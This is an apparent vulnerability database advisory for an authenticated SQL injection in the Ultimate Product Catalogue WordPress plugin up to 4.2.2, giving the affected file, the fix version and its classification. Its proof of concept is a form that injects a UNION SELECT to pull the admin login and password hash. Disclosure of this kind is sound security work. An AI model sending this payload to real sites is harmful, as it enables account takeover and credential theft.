Ultimate Product Catalogue <= 4.2.2 - Authenticated SQL Injection



Description
Type user access: subscriber upwards.

$_POST[‘CatID’] is not escaped.

File / Code:

Path: /wp-content/plugins/ultimate-product-catalogue/Functions/Process_Ajax.php

Proof of Concept
<form method="post" action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<input type="text" name="CatID" value="0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1">
<input type="submit">

Affects Plugin

fixed in version 4.2.3

References

URL http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite / Log.pt
Submitter Website http://lenonleite.com.br/
Submitter Twitter log_oscon
Views 4924
Verified Yes
WPVDB ID 8853

Timeline

Publicly Published 2017-06-27 (over 2 years ago)
Added 2017-06-28 (over 2 years ago)
Last Updated 2017-06-28 (over 2 years ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin